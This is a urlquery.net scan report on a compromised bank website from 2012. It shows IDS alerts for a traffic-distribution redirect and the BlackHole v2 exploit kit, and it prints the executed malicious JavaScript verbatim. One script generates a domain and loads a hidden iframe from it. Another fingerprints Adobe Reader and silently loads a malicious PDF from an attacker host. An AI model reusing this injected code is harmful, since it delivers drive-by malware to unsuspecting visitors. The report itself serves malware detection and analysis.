urlquery.net - Free url scanner

Overview

URL	http://www.atabank.com/
IP	109.127.1.28
ASN	AS15621 Azerbaijan Data Network
Location	Azerbaijan
Report completed	2012-11-07 22:49:24 CET
Status	Loading report..
urlQuery Alerts	Detected a Dynamic DNS URL Detected SutraTDS URL pattern Detected live BlackHole v2.0 exploit kit

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-07 22:48:24	109.127.1.28	urlQuery Client	1	ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-11-07 22:48:25	109.127.1.28	urlQuery Client	1	ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-11-07 22:48:25	109.127.1.28	urlQuery Client	1	ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-11-07 22:48:25	109.127.1.28	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),
2012-11-07 22:48:25	109.127.1.28	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),
2012-11-07 22:48:25	109.127.1.28	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),
2012-11-07 22:48:26	urlQuery Client	31.148.219.6	2	ET CURRENT_EVENTS TDS Sutra - request in.cgi
2012-11-07 22:48:47	208.131.138.9	urlQuery Client	3	FILEMAGIC Zip archive data
2012-11-07 22:48:54	208.131.138.9	urlQuery Client	1	ET CURRENT_EVENTS Blackhole Java Exploit Recent Jar (3)

Snort /w Sourcefire VRT

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-07 22:48:25	urlQuery Client	31.148.219.6	1	MALWARE-CNC TDS Sutra - request in.cgi
2012-11-07 22:48:26	208.131.138.9	urlQuery Client	1	EXPLOIT-KIT Blackholev2 landing page received - specific structure
2012-11-07 22:48:29	208.131.138.9	urlQuery Client	3	FILE-PDF Overly large CreationDate within a pdf - likely malicious
2012-11-07 22:48:29	208.131.138.9	urlQuery Client	1	FILE-PDF EmbeddedFile contained within a PDF

Recent reports on same IP/ASN/Domain

Last 1 reports on IP: 109.127.1.28

Date	Alerts / IDS	URL	IP
2012-11-17 20:17:18	1 / 6	http://www.atabank.com/	109.127.1.28

Last 6 reports on ASN: AS15621 Azerbaijan Data Network

Date	Alerts / IDS	URL	IP
2013-02-15 10:05:17	0 / 0	http://yenimarket.az/index.php/2012-12-19-16-12-50/ad/starye-postrojkiÃÂ¢&A (...)	109.127.1.30
2013-02-13 05:14:10	0 / 0	http://yenimarket.az/index.php/2012-12-19-16-12-50/ad/starye-postrojkiÃÂ¢&A (...)	109.127.1.30
2013-02-10 08:27:58	0 / 0	http://yenimarket.az/index.php/2012-12-19-16-12-50/ad/novostrojkiÃÂ¢Ã (...)	109.127.1.30
2013-02-10 08:25:00	0 / 0	http://www.realestate.com.az	109.127.1.30
2013-02-08 17:20:37	2 / 3	http://www.greenapple-az.com/business.htm	109.127.1.30
2013-02-08 08:55:25	2 / 4	http://www.greenapple-az.com/	109.127.1.30

Last 1 reports on domain: www.atabank.com

Date	Alerts / IDS	URL	IP
2012-11-17 20:17:18	1 / 6	http://www.atabank.com/	109.127.1.28

JavaScript

Executed Scripts (9)

Executed Evals (3)

#1 JavaScript::Eval (size: 1781, repeated: 5)

function nextRandomNumber() {
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if (test > 0) {
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix) {
    var d = new Date(unix * 1000);
    var s = Math.ceil(d.getHours() / 3);
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this;
}

function createRandomNumber(r, Min, Max) {
    return Math.round((Max - Min) * r.next() + Min);
}

function generatePseudoRandomString(unix, length, zone) {
    var rand = new RandomNumberGenerator(unix);
    var letters = "qmahgwctopfjilrfpjrfcwgewheizwdw".split('');
    var str = '';
    for (var i = 0; i < length; i++) {
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }
    return str + '.' + zone;
}

setInterval(function() {
    try {
        if (typeof iframeWasCreated == "undefined") {
            var unix = Math.round(+new Date() / 1000);
            var domainName = generatePseudoRandomString(unix, 16, 'mynumber.org');
            ifrm = document.createElement("IFRAME");
            ifrm.setAttribute("src", "http://" + domainName + "/in.cgi?14");
            ifrm.style.width = "0px";
            ifrm.style.height = "0px";
            ifrm.style.visibility = "hidden";
            document.body.appendChild(ifrm);
            iframeWasCreated = true;
        }
    } catch (e) {
        iframeWasCreated = undefined;
    }
}, 100);

#2 JavaScript::Eval (size: 8, repeated: 1)

parseInt

#3 JavaScript::Eval (size: 12346, repeated: 1) - Alert detect on script (Severity: 1)

try {
    var PluginDetect = {
        version: "0.7.8",
        name: "PluginDetect",
        handler: function(c, b, a) {
            return function() {
                c(b, a)
            }
        },
        isDefined: function(b) {
            return typeof b != "undefined"
        },
        isArray: function(b) {
            return (/array/i).test(Object.prototype.toString.call(b))
        },
        isFunc: function(b) {
            return typeof b == "function"
        },
        isString: function(b) {
            return typeof b == "string"
        },
        isNum: function(b) {
            return typeof b == "number"
        },
        isStrNum: function(b) {
            return (typeof b == "string" && (/\d/).test(b))
        },
        getNumRegx: /[\d][\d\.\_,-]*/,
        splitNumRegx: /[\.\_,-]/g,
        getNum: function(b, c) {
            var d = this,
                a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
            return a ? a[0] : null
        },
        compareNums: function(h, f, d) {
            var e = this,
                c, b, a, g = parseInt;
            if (e.isStrNum(h) && e.isStrNum(f)) {
                if (e.isDefined(d) && d.compareNums) {
                    return d.compareNums(h, f)
                }
                c = h.split(e.splitNumRegx);
                b = f.split(e.splitNumRegx);
                for (a = 0; a < Math.min(c.length, b.length); a++) {
                    if (g(c[a], 10) > g(b[a], 10)) {
                        return 1
                    }
                    if (g(c[a], 10) < g(b[a], 10)) {
                        return -1
                    }
                }
            }
            return 0
        },
        formatNum: function(b, c) {
            var d = this,
                a, e;
            if (!d.isStrNum(b)) {
                return null
            }
            if (!d.isNum(c)) {
                c = 4
            }
            c--;
            e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
            for (a = 0; a < 4; a++) {
                if (/^(0+)(.+)$/.test(e[a])) {
                    e[a] = RegExp.$2
                }
                if (a > c || !(/\d/).test(e[a])) {
                    e[a] = "0"
                }
            }
            return e.slice(0, 4).join(",")
        },
        $$hasMimeType: function(a) {
            return function(c) {
                if (!a.isIE && c) {
                    var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
                    for (b = 0; b < d.length; b++) {
                        if (a.isString(d[b]) && /[^\s]/.test(d[b])) {
                            f = navigator.mimeTypes[d[b]];
                            e = f ? f.enabledPlugin : 0;
                            if (e && (e.name || e.description)) {
                                return f
                            }
                        }
                    }
                }
                return null
            }
        },
        findNavPlugin: function(l, e, c) {
            var j = this,
                h = new RegExp(l, "i"),
                d = (!j.isDefined(e) || e) ? /\d/ : 0,
                k = c ? new RegExp(c, "i") : 0,
                a = navigator.plugins,
                g = "",
                f, b, m;
            for (f = 0; f < a.length; f++) {
                m = a[f].description || g;
                b = a[f].name || g;
                if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
                    if (!k || !(k.test(m) || k.test(b))) {
                        return a[f]
                    }
                }
            }
            return null
        },
        getMimeEnabledPlugin: function(k, m, c) {
            var e = this,
                f, b = new RegExp(m, "i"),
                h = "",
                g = c ? new RegExp(c, "i") : 0,
                a, l, d, j = e.isString(k) ? [k] : k;
            for (d = 0; d < j.length; d++) {
                if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
                    l = f.description || h;
                    a = f.name || h;
                    if (b.test(l) || b.test(a)) {
                        if (!g || !(g.test(l) || g.test(a))) {
                            return f
                        }
                    }
                }
            }
            return 0
        },
        getPluginFileVersion: function(f, b) {
            var h = this,
                e, d, g, a, c = -1;
            if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
                return b
            }
            if (!b) {
                return e
            }
            e = h.formatNum(e);
            b = h.formatNum(b);
            d = b.split(h.splitNumRegx);
            g = e.split(h.splitNumRegx);
            for (a = 0; a < d.length; a++) {
                if (c > -1 && a > c && d[a] != "0") {
                    return b
                }
                if (g[a] != d[a]) {
                    if (c == -1) {
                        c = a
                    }
                    if (d[a] != "0") {
                        return b
                    }
                }
            }
            return e
        },
        AXO: window.ActiveXObject,
        getAXO: function(a) {
            var f = null,
                d, b = this,
                c = {};
            try {
                f = new b.AXO(a)
            } catch (d) {}
            return f
        },
        convertFuncs: function(f) {
            var a, g, d, b = /^[\$][\$]/,
                c = this;
            for (a in f) {
                if (b.test(a)) {
                    try {
                        g = a.slice(2);
                        if (g.length > 0 && !f[g]) {
                            f[g] = f[a](f);
                            delete f[a]
                        }
                    } catch (d) {}
                }
            }
        },
        initObj: function(e, b, d) {
            var a, c;
            if (e) {
                if (e[b[0]] == 1 || d) {
                    for (a = 0; a < b.length; a = a + 2) {
                        e[b[a]] = b[a + 1]
                    }
                }
                for (a in e) {
                    c = e[a];
                    if (c && c[b[0]] == 1) {
                        this.initObj(c, b)
                    }
                }
            }
        },
        initScript: function() {
            var c = this,
                a = navigator,
                e = "/",
                f, i = a.userAgent || "",
                g = a.vendor || "",
                b = a.platform || "",
                h = a.product || "";
            c.initObj(c, ["$", c]);
            for (f in c.Plugins) {
                if (c.Plugins[f]) {
                    c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
                }
            };
            c.OS = 100;
            if (b) {
                var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "", 100];
                for (f = d.length - 2; f >= 0; f = f - 2) {
                    if (d[f] && new RegExp(d[f], "i").test(b)) {
                        c.OS = d[f + 1];
                        break
                    }
                }
            }
            c.convertFuncs(c);
            c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0] || document.body || null);
            c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
            c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
            c.ActiveXEnabled = false;
            if (c.isIE) {
                var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
                for (f = 0; f < j.length; f++) {
                    if (c.getAXO(j[f])) {
                        c.ActiveXEnabled = true;
                        break
                    }
                }
            }
            c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
            c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
            c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
            c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
            c.isSafari = ((/Apple/i).test(g) || (!g && !c.isChrome)) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
            c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(RegExp.$1) : null;
            c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
            c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
            c.addWinEvent("load", c.handler(c.runWLfuncs, c))
        },
        init: function(d) {
            var c = this,
                b, d, a = {
                    status: -3,
                    plugin: 0
                };
            if (!c.isString(d)) {
                return a
            }
            if (d.length == 1) {
                c.getVersionDelimiter = d;
                return a
            }
            d = d.toLowerCase().replace(/\s/g, "");
            b = c.Plugins[d];
            if (!b || !b.getVersion) {
                return a
            }
            a.plugin = b;
            if (!c.isDefined(b.installed)) {
                b.installed = null;
                b.version = null;
                b.version0 = null;
                b.getVersionDone = null;
                b.pluginName = d
            }
            c.garbage = false;
            if (c.isIE && !c.ActiveXEnabled && d !== "java") {
                a.status = -2;
                return a
            }
            a.status = 1;
            return a
        },
        fPush: function(b, a) {
            var c = this;
            if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
                a.push(b)
            }
        },
        callArray: function(b) {
            var c = this,
                a;
            if (c.isArray(b)) {
                for (a = 0; a < b.length; a++) {
                    if (b[a] === null) {
                        return
                    }
                    c.call(b[a]);
                    b[a] = null
                }
            }
        },
        call: function(c) {
            var b = this,
                a = b.isArray(c) ? c.length : -1;
            if (a > 0 && b.isFunc(c[0])) {
                c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
            } else {
                if (b.isFunc(c)) {
                    c(b)
                }
            }
        },
        getVersionDelimiter: ",",
        $$getVersion: function(a) {
            return function(g, d, c) {
                var e = a.init(g),
                    f, b, h = {};
                if (e.status < 0) {
                    return null
                };
                f = e.plugin;
                if (f.getVersionDone != 1) {
                    f.getVersion(null, d, c);
                    if (f.getVersionDone === null) {
                        f.getVersionDone = 1
                    }
                }
                a.cleanup();
                b = (f.version || f.version0);
                b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
                return b
            }
        },
        cleanup: function() {},
        addWinEvent: function(d, c) {
            var e = this,
                a = window,
                b;
            if (e.isFunc(c)) {
                if (a.addEventListener) {
                    a.addEventListener(d, c, false)
                } else {
                    if (a.attachEvent) {
                        a.attachEvent("on" + d, c)
                    } else {
                        b = a["on" + d];
                        a["on" + d] = e.winHandler(c, b)
                    }
                }
            }
        },
        winHandler: function(d, c) {
            return function() {
                d();
                if (typeof c == "function") {
                    c()
                }
            }
        },
        WLfuncs0: [],
        WLfuncs: [],
        runWLfuncs: function(a) {
            var b = {};
            a.winLoaded = true;
            a.callArray(a.WLfuncs0);
            a.callArray(a.WLfuncs);
            if (a.onDoneEmptyDiv) {
                a.onDoneEmptyDiv()
            }
        },
        winLoaded: false,
        $$onWindowLoaded: function(a) {
            return function(b) {
                if (a.winLoaded) {
                    a.call(b)
                } else {
                    a.fPush(b, a.WLfuncs)
                }
            }
        },
        div: null,
        divID: "plugindetect",
        divWidth: 50,
        pluginSize: 1,
        emptyDiv: function() {
            var d = this,
                b, h, c, a, f, g;
            if (d.div && d.div.childNodes) {
                for (b = d.div.childNodes.length - 1; b >= 0; b--) {
                    c = d.div.childNodes[b];
                    if (c && c.childNodes) {
                        for (h = c.childNodes.length - 1; h >= 0; h--) {
                            g = c.childNodes[h];
                            try {
                                c.removeChild(g)
                            } catch (f) {}
                        }
                    }
                    if (c) {
                        try {
                            d.div.removeChild(c)
                        } catch (f) {}
                    }
                }
            }
            if (!d.div) {
                a = document.getElementById(d.divID);
                if (a) {
                    d.div = a
                }
            }
            if (d.div && d.div.parentNode) {
                try {
                    d.div.parentNode.removeChild(d.div)
                } catch (f) {}
                d.div = null
            }
        },
        DONEfuncs: [],
        onDoneEmptyDiv: function() {
            var c = this,
                a, b;
            if (!c.winLoaded) {
                return
            }
            if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
                return
            }
            for (a in c) {
                b = c[a];
                if (b && b.funcs) {
                    if (b.OTF == 3) {
                        return
                    }
                    if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
                        return
                    }
                }
            }
            for (a = 0; a < c.DONEfuncs.length; a++) {
                c.callArray(c.DONEfuncs)
            }
            c.emptyDiv()
        },
        getWidth: function(c) {
            if (c) {
                var a = c.scrollWidth || c.offsetWidth,
                    b = this;
                if (b.isNum(a)) {
                    return a
                }
            }
            return -1
        },
        getTagStatus: function(m, g, a, b) {
            var c = this,
                f, k = m.span,
                l = c.getWidth(k),
                h = a.span,
                j = c.getWidth(h),
                d = g.span,
                i = c.getWidth(d);
            if (!k || !h || !d || !c.getDOMobj(m)) {
                return -2
            }
            if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
                return 0
            }
            if (l >= i) {
                return -1
            }
            try {
                if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
                    if (!m.winLoaded && c.winLoaded) {
                        return 1
                    }
                    if (m.winLoaded && c.isNum(b)) {
                        if (!c.isNum(m.count)) {
                            m.count = b
                        }
                        if (b - m.count >= 10) {
                            return 1
                        }
                    }
                }
            } catch (f) {}
            return 0
        },
        getDOMobj: function(g, a) {
            var f, d = this,
                c = g ? g.span : 0,
                b = c && c.firstChild ? 1 : 0;
            try {
                if (b && a) {
                    d.div.focus()
                }
            } catch (f) {}
            return b ? c.firstChild : null
        },
        setStyle: function(b, g) {
            var f = b.style,
                a, d, c = this;
            if (f && g) {
                for (a = 0; a < g.length; a = a + 2) {
                    try {
                        f[g[a]] = g[a + 1]
                    } catch (d) {}
                }
            }
        },
        insertDivInBody: function(a, i) {
            var h, f = this,
                b = "pd33993399",
                d = null,
                j = i ? window.top.document : window.document,
                c = "<",
                g = (j.getElementsByTagName("body")[0] || j.body);
            if (!g) {
                try {
                    j.write(c + 'div id="' + b + '">o' + c + "/div>");
                    d = j.getElementById(b)
                } catch (h) {}
            }
            g = (j.getElementsByTagName("body")[0] || j.body);
            if (g) {
                if (g.firstChild && f.isDefined(g.insertBefore)) {
                    g.insertBefore(a, g.firstChild)
                } else {
                    g.appendChild(a)
                }
                if (d) {
                    g.removeChild(d)
                }
            } else {}
        },
        insertHTML: function(g, b, h, a, l) {
            var m, n = document,
                k = this,
                q, p = n.createElement("span"),
                o, j, f = "<";
            var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
            var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
            if (!k.isDefined(a)) {
                a = ""
            }
            if (k.isString(g) && (/[^\s]/).test(g)) {
                g = g.toLowerCase().replace(/\s/g, "");
                q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
                q += 'style="' + i + 'display:inline;" ';
                for (o = 0; o < b.length; o = o + 2) {
                    if (/[^\s]/.test(b[o + 1])) {
                        q += b[o] + '="' + b[o + 1] + '" '
                    }
                }
                q += ">";
                for (o = 0; o < h.length; o = o + 2) {
                    if (/[^\s]/.test(h[o + 1])) {
                        q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
                    }
                }
                q += a + f + "/" + g + ">"
            } else {
                q = a
            }
            if (!k.div) {
                j = n.getElementById(k.divID);
                if (j) {
                    k.div = j
                } else {
                    k.div = n.createElement("div");
                    k.div.id = k.divID
                }
                k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize + 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
                if (!j) {
                    k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
                    k.insertDivInBody(k.div)
                }
            }
            if (k.div && k.div.parentNode) {
                k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
                try {
                    p.innerHTML = q
                } catch (m) {};
                try {
                    k.div.appendChild(p)
                } catch (m) {};
                return {
                    span: p,
                    winLoaded: k.winLoaded,
                    tagName: g,
                    outerHTML: q
                }
            }
            return {
                span: null,
                winLoaded: k.winLoaded,
                tagName: "",
                outerHTML: q
            }
        },
        Plugins: {
            adobereader: {
                mimeType: "application/pdf",
                navPluginObj: null,
                progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
                classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
                INSTALLED: {},
                pluginHasMimeType: function(d, c, f) {
                    var b = this,
                        e = b.$,
                        a;
                    for (a in d) {
                        if (d[a] && d[a].type && d[a].type == c) {
                            return 1
                        }
                    }
                    if (e.getMimeEnabledPlugin(c, f)) {
                        return 1
                    }
                    return 0
                },
                getVersion: function(l, j) {
                    var g = this,
                        d = g.$,
                        i, f, m, n, b = null,
                        h = null,
                        k = g.mimeType,
                        a, c;
                    if (d.isString(j)) {
                        j = j.replace(/\s/g, "");
                        if (j) {
                            k = j
                        }
                    } else {
                        j = null
                    }
                    if (d.isDefined(g.INSTALLED[k])) {
                        g.installed = g.INSTALLED[k];
                        return
                    }
                    if (!d.isIE) {
                        a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
                        if (g.getVersionDone !== 0) {
                            g.getVersionDone = 0;
                            b = d.getMimeEnabledPlugin(g.mimeType, a);
                            if (!j) {
                                n = b
                            }
                            if (!b && d.hasMimeType(g.mimeType)) {
                                b = d.findNavPlugin(a, 0)
                            }
                            if (b) {
                                g.navPluginObj = b;
                                h = d.getNum(b.description) || d.getNum(b.name);
                                h = d.getPluginFileVersion(b, h);
                                if (!h && d.OS == 1) {
                                    if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)) {
                                        h = "9"
                                    } else {
                                        if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)) {
                                            h = "8"
                                        }
                                    }
                                }
                            }
                        } else {
                            h = g.version
                        }
                        if (!d.isDefined(n)) {
                            n = d.getMimeEnabledPlugin(k, a)
                        }
                        g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
                    } else {
                        b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
                        c = /=\s*([\d\.]+)/g;
                        try {
                            f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions();
                            for (m = 0; m < 5; m++) {
                                if (c.test(f) && (!h || RegExp.$1 > h)) {
                                    h = RegExp.$1
                                }
                            }
                        } catch (i) {}
                        g.installed = h ? 1 : (b ? 0 : -1)
                    }
                    if (!g.version) {
                        g.version = d.formatNum(h)
                    }
                    g.INSTALLED[k] = g.installed
                }
            },
            zz: 0
        }
    };
    PluginDetect.initScript();
    PluginDetect.getVersion(".");
    pdfver = PluginDetect.getVersion("AdobeReader");
} catch (e) {}
if (typeof pdfver == 'string') {
    pdfver = pdfver.split('.')
} else {
    pdfver = [0, 0, 0, 0]
}
function x(s) {
    d = [];
    for (i = 0; i < s.length; i++) {
        k = (s.charCodeAt(i)).toString(33);
        d.push(k);
    };
    return d.join(":");
}
end_redirect = function() {
    window.location.href = 'http://www.google.com/';
};
window.onbeforeunload = function() {
    return "";
};
try {
    show_pdf2 = function(src) {
        d = document;
        cr = "create";
        cr += "Element";
        var p = d[cr]('object');
        p.setAttribute('type', 'application/pdf');
        p.setAttribute('data', src);
        p.setAttribute('width', 1);
        p.setAttribute('height', 1);
        document.body.appendChild(p)
    };
    show_pdf2("http://nnvxf.lflinkup.com/guaranteeing/academic_natural.php?hiqbfi=" + x("1afab") + "&rhfsm=" + x("c") + "&xevgnte=1j:1h:1n:33:1f:1i:1n:1j:1l:1m&ylvrgkqq=" + x(pdfver.join(".")));
} catch (errno) {}
document.write('');
setTimeout(end_redirect, 60000);

Executed Writes (1)

#1 JavaScript::Write (size: 0, repeated: 1)

HTTP Transactions (59)

Request	Response
GET /css/style.css HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: text/css Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Mon, 29 Oct 2012 09:40:57 GMT Etag: "258020b-2faf-4cd2f7770f844" Accept-Ranges: bytes Content-Length: 12207 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
GET /js/menu/js/jquery.dropdownPlain.js HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: application/javascript Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:55 GMT Etag: "2580385-15b-4ccb6c4431a69" Accept-Ranges: bytes Content-Length: 347 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
GET /css/fonts.css HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: text/css Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:39:55 GMT Etag: "258020a-147-4ccb6c0aba0c4" Accept-Ranges: bytes Content-Length: 327 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
GET /img/favicon.ico HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/x-icon Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:12 GMT Etag: "25802f4-2fe-4ccb6c1af9f5f" Accept-Ranges: bytes Content-Length: 766 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
GET /js/menu/css/style.css HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: text/css Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:54 GMT Etag: "258037e-baa-4ccb6c42add6e" Accept-Ranges: bytes Content-Length: 2986 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive
GET /js/jquery.ennui.contentslider.css HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: text/css Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:59 GMT Etag: "258038e-414-4ccb6c47c540d" Accept-Ranges: bytes Content-Length: 1044 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive
